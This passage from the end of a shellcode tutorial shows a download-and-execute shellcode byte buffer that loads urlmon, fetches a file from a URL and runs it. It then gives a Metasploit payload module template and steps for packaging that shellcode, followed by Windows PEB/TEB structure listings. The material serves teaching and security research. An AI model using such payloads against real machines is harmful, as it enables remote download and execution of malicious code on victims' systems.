"\x09\x8B\x71\x08\x8D\x5D\xE8\xE8"+
"\x24\xFF\xFF\xFF\x33\xC0\x66\xB8"+
"\x6C\x6C\x50\x68\x6F\x6E\x2E\x64"+
"\x68\x75\x72\x6C\x6D\x54\xFF\x55"+
"\xE8\x8B\xF0\xE8\x08\xFF\xFF\xFF"+
"\x8B\x7D\xE4\x33\xC0\xB0\x90\xF2"+
"\xAE\x88\x67\xFF\x89\x7D\xE0\xB0"+
"\xC8\x2B\xE0\x8B\xF4\x50\x56\x57"+
"\xFF\x55\xF8\x33\xC0\x50\x50\x56"+
"\xFF\x75\xE4\x50\xFF\x55\xF4\x8B"+
"\xF8\x57\x33\xC9\xB1\x44\x8D\x7D"+
"\x9C\x33\xC0\xF3\xAA\xB1\x10\x8D"+
"\x7D\x8C\x33\xC0\xF3\xAA\x5F\xC6"+
"\x45\x9C\x44\x66\xC7\x45\xC8\x01"+
"\x01\x33\xC0\x8D\x4D\x8C\x8D\x55"+
"\x9C\x51\x52\x50\x50\x50\x6A\x01"+
"\x50\x50\x56\x50\xFF\x55\xEC\x6A"+
"\xFF\xFF\x75\x8C\xFF\x55\xF0\xC9"+
"\xC3"

I did that by using the DataRipper and UltraEdit programs to create this string from the binary of the shellcode inside OllyDbg, with some find/replace passes to reach this shape.
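If you prefer to script the conversion, the same formatting takes a few lines of Python. This is a minimal sketch and not the tooling used above; the function name to_ruby_buffer is made up, and the sample is the first 10 bytes of the buffer shown earlier.

```python
def to_ruby_buffer(code: bytes, per_line: int = 8) -> str:
    """Format bytes as Ruby string literals, `per_line` bytes per line,
    joined with '+' in the same style as the buffer above."""
    lines = []
    for start in range(0, len(code), per_line):
        chunk = code[start:start + per_line]
        lines.append('"' + "".join(f"\\x{value:02X}" for value in chunk) + '"')
    return "+\n".join(lines)

sample = bytes.fromhex("EB035BEB05E8F8FFFFFF")
print(to_ruby_buffer(sample))
```

The input can come from any file that holds the assembled bytes, for example `open(path, "rb").read()`.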

After that, you should create your own Ruby payload module. To do that, you can use the following as a template, which I’ll describe now.

Ruby
##
# $Id: download_exec.rb 9488 2010-06-11 16:12:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# these are important
require 'msf/core'

# this depends on your shellcode type
# (Exec for normal shellcodes without any command shell)
require 'msf/core/payload/windows/exec'

module Metasploit3
  include Msf::Payload::Windows
  include Msf::Payload::Single

  # The initialization function
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'The Name of Your shellcode',
      'Version' => '$Revision: 9488 $',
      'Description' => 'The Description of your Shellcode',
      'Author' => 'your name',
      'License' => BSD_LICENSE,
      'Platform' => 'win',
      'Arch' => ARCH_X86,
      'Privileged' => false,
      'Payload' =>
        {
          'Offsets' => { },
          'Payload' =>
            "\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF"+
            "\xC3"
        }
    ))

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options
    register_options(
      [
        OptString.new('URL', [ true, "The Description" ]),
        OptString.new('Filename', [ true, "The Description" ])
      ], self.class)
  end

  #
  # Constructs the payload
  #
  # You can get your parameters from datastore['Your Parameter']

  def generate_stage
    return module_info['Payload']['Payload'] + (datastore['URL'] || '') +
      "\x90" + (datastore['Filename'] || '') + "\x00"
  end
end

The code may be hard to understand if you don’t know Ruby, but it’s very easy to work with. You only need to modify it a little to suit your shellcode.

To modify it, follow these steps:

  1. First, add the information about your shellcode, including the binary of your shellcode in Payload.
  2. Then, add your shellcode parameters in register_options, each with its description.
  3. Finally, modify the generate_stage function to generate your payload. You can get your parameters easily with datastore['Your Parameter'] and add them to the payload.
  4. You can also get your payload with module_info['Payload']['Payload'] and merge your parameters into it as shown in the sample.
  5. At the end, you will have your working shellcode. Save the file inside its category, for example \msf3\modules\payloads\singles\windows to place it in the windows category.
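The layout that generate_stage produces in the template is the fixed body, then the URL, a 90H separator, the filename, and a terminating zero. The Python sketch below models only that data layout and how a scan for 90H splits it again. The two CCH bytes are a placeholder rather than a real body, and the function names, URL and file name are made up for this illustration.

```python
def build_stage(body: bytes, url: str, filename: str) -> bytes:
    """Mirror of the concatenation done by generate_stage in the template."""
    return (body + url.encode("ascii") + b"\x90"
            + filename.encode("ascii") + b"\x00")

def split_data(data: bytes):
    """Cut the data at the first 90H, then stop the filename at the zero."""
    url, _, rest = data.partition(b"\x90")
    filename = rest.split(b"\x00", 1)[0]
    return url, filename

BODY = b"\xCC\xCC"  # placeholder bytes, not a real payload
stage = build_stage(BODY, "http://localhost:3000/1.exe", r"%appdata%\demo.exe")
print(split_data(stage[len(BODY):]))
```

One consequence of this design is that neither parameter may contain a 90H byte itself, and the filename may not contain a zero byte.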

If anything is still unclear, I added the Metasploit modules of the shellcodes that we created to the sources. You can check them and try to modify them.

6. Conclusion

Today, 0-day exploits are behind many new threats, and the key to any successful exploit is reliable shellcode.

In this article, we described how to write your own shellcode and how to work within its limitations (null-free and alphanumeric shellcode). We also described how to implement your shellcode in Metasploit so that it is easy to use inside your exploit.

7. References

  1. “Writing ia32 alphanumeric shellcodes” in Phrack
  2. “Understanding Windows Shellcode” by skape – 2003
  3. “Advanced Windows Debugging: Memory Corruption Part II—Heaps” By Daniel Pravat and Mario Hewardt - Nov 9, 2007

8. Appendix I – Important Structures

C++
typedef struct _PEB {
        BOOLEAN InheritedAddressSpace;     //+00
        BOOLEAN ReadImageFileExecOptions;     //+01
        BOOLEAN BeingDebugged;             //+02
        BOOLEAN Spare;                 //+03
        HANDLE Mutant;                 //+04
        PVOID ImageBaseAddress;         //+08
        PPEB_LDR_DATA LoaderData;         //+0C
        PRTL_USER_PROCESS_PARAMETERS ProcessParameters; //+10
        PVOID SubSystemData;             //+14
        PVOID ProcessHeap;             //+18
        PVOID FastPebLock;             //+1C
        PPEBLOCKROUTINE FastPebLockRoutine; //+20
        PPEBLOCKROUTINE FastPebUnlockRoutine; //+24
        ULONG EnvironmentUpdateCount;     //+28
        PPVOID KernelCallbackTable;         //+2C
        PVOID EventLogSection;             //+30
        PVOID EventLog;                 //+34
        PPEB_FREE_BLOCK FreeList;         //+38
        ULONG TlsExpansionCounter;         //+3C
        PVOID TlsBitmap;                 //+40
        ULONG TlsBitmapBits[0x2];         //+44
        PVOID ReadOnlySharedMemoryBase;     //+4C
        PVOID ReadOnlySharedMemoryHeap;     //+50
        PPVOID ReadOnlyStaticServerData;     //+54
        PVOID AnsiCodePageData;         //+58
        PVOID OemCodePageData;             //+5C
        PVOID UnicodeCaseTableData;         //+60
        ULONG NumberOfProcessors;         //+64
        ULONG NtGlobalFlag;             //+68
        BYTE Spare2[0x4];             //+6C
        LARGE_INTEGER CriticalSectionTimeout; //+70
        ULONG HeapSegmentReserve;         //+78
        ULONG HeapSegmentCommit;         //+7C
        ULONG HeapDeCommitTotalFreeThreshold;//+80
        ULONG HeapDeCommitFreeBlockThreshold;//+84
        ULONG NumberOfHeaps;             //+88
        ULONG MaximumNumberOfHeaps;         //+8C
        PPVOID *ProcessHeaps;             //+90
        PVOID GdiSharedHandleTable;
        PVOID ProcessStarterHelper;
        PVOID GdiDCAttributeList;
        PVOID LoaderLock;
        ULONG OSMajorVersion;
        ULONG OSMinorVersion;
        ULONG OSBuildNumber;
        ULONG OSPlatformId;
        ULONG ImageSubSystem;
        ULONG ImageSubSystemMajorVersion;
        ULONG ImageSubSystemMinorVersion;
        ULONG GdiHandleBuffer[0x22];
        ULONG PostProcessInitRoutine;
        ULONG TlsExpansionBitmap;
        BYTE TlsExpansionBitmapBits[0x80];
        ULONG SessionId;
} PEB, *PPEB;
typedef struct TIB
{
        PEXCEPTION_REGISTRATION_RECORD* ExceptionList;     //FS:[0x00]
        dword StackBase;                          //FS:[0x04]
        dword StackLimit;                     //FS:[0x08]
        dword SubSystemTib;                     //FS:[0x0C]
        dword FiberData;                         //FS:[0x10]
        dword ArbitraryUserPointer;                 //FS:[0x14]
        dword TIB;                             //FS:[0x18]
};
typedef struct TEB {
        dword EnvironmentPointer;                 // FS:[1C]
        dword ProcessId;                         // FS:[20]
        dword threadId;                         // FS:[24]
        dword ActiveRpcInfo;                     // FS:[28]
        dword ThreadLocalStoragePointer;             // FS:[2C]
        PEB* Peb;                             // FS:[30]
        dword LastErrorValue;                     // FS:[34]
};

History

  • 4th February, 2012: Initial version

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)